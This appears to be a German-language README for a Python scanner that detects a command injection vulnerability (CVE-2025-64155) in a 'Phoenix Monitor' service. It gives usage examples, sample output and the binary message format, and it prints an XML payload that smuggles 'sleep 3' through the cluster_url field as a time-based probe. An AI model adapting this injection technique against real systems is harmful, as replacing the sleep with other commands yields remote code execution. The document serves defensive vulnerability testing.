
CVE-2025-64155-hunter
Ein Python-Scanner zur Erkennung der Befehlseinschleusungs-Schwachstelle (CVE-2025-64155) im Phoenix Monitor-Dienst.
CVE-2025-64155 ist eine Befehlseinschleusungs-Schwachstelle im Phoenix Monitor-Dienst, die Remote-Code-Ausführung über den Parameter cluster_url im Befehl handleStorageRequest (Befehls-ID: 1075724911) ermöglicht.
Die Schwachstelle tritt auf, wenn eine benutzergesteuerte Eingabe im Feld cluster_url ohne ordnungsgemäße Bereinigung an einen Shell-Befehl übergeben wird, was eine Befehlseinschleusung über Shell-Metazeichen ermöglicht.
Dieser Scanner basiert auf der Exploit-Forschung von Horizon3AI.
python3 scanner.py -t <target_ip>
# Specify custom port
python3 scanner.py -t 192.168.1.100 -p 7900
# Enable verbose output
python3 scanner.py -t 192.168.1.100 -v
# Set custom timeout
python3 scanner.py -t 192.168.1.100 --timeout 15
# Check if service is accessible (no vulnerability test)
python3 scanner.py -t 192.168.1.100 --check-only
-t, --target: Ziel-IP-Adresse oder Hostname (erforderlich)-p, --port: Port des Phoenix Monitor-Dienstes (Standard: 7900)--timeout: Verbindungs-Timeout in Sekunden (Standard: 10)-v, --verbose: Ausführliche Ausgabe aktivieren--check-only: Nur prüfen, ob der Dienst erreichbar istDer Scanner verwendet eine zeitbasierte Erkennungsmethode:
handleStorageRequest-Befehl mit einer schädlichen Nutzlast, die sleep 3 im Feld cluster_url enthältDiese Methode ist sicher und nicht destruktiv – sie führt keine schädlichen Befehle aus, sondern nur einen harmlosen sleep-Befehl zu Erkennungszwecken.
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900
[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 3.12 seconds
============================================================
[+] VULNERABLE: Target appears to be vulnerable to CVE-2025-64155
[+] Details: Time-based detection: Response delayed by 3.12s (likely command injection)
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900
[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 0.45 seconds
============================================================
[-] NOT VULNERABLE: Target does not appear to be vulnerable
[-] Details: Response received quickly (0.45s), likely not vulnerable
Der Scanner sendet eine binäre Nachricht mit der folgenden Struktur:
[4 Bytes] Nachrichtenlänge (156)
[4 Bytes] Nutzlastlänge
[4 Bytes] Befehls-ID (1075724911 = 0x4018006F = handleStorageRequest)
[4 Bytes] Padding/Flags (0)
[Variable] XML-Nutzlast
Die XML-Nutzlast enthält eine Befehlseinschleusung im Feld cluster_url:
<TEST_STORAGE type="elastic">
<cluster_url>http://10.0.0.1:9200 --next -o /dev/null sleep 3</cluster_url>
...
</TEST_STORAGE>
Dieses Tool ist nur für autorisierte Sicherheitstests und Forschungszwecke bestimmt. Verwenden Sie dieses Tool nur auf Systemen, die Ihnen gehören oder für die Sie ausdrückliche Erlaubnis zum Testen haben. Unbefugter Zugriff auf Computersysteme ist illegal.
MIT-Lizenz – siehe LICENSE-Datei für Details.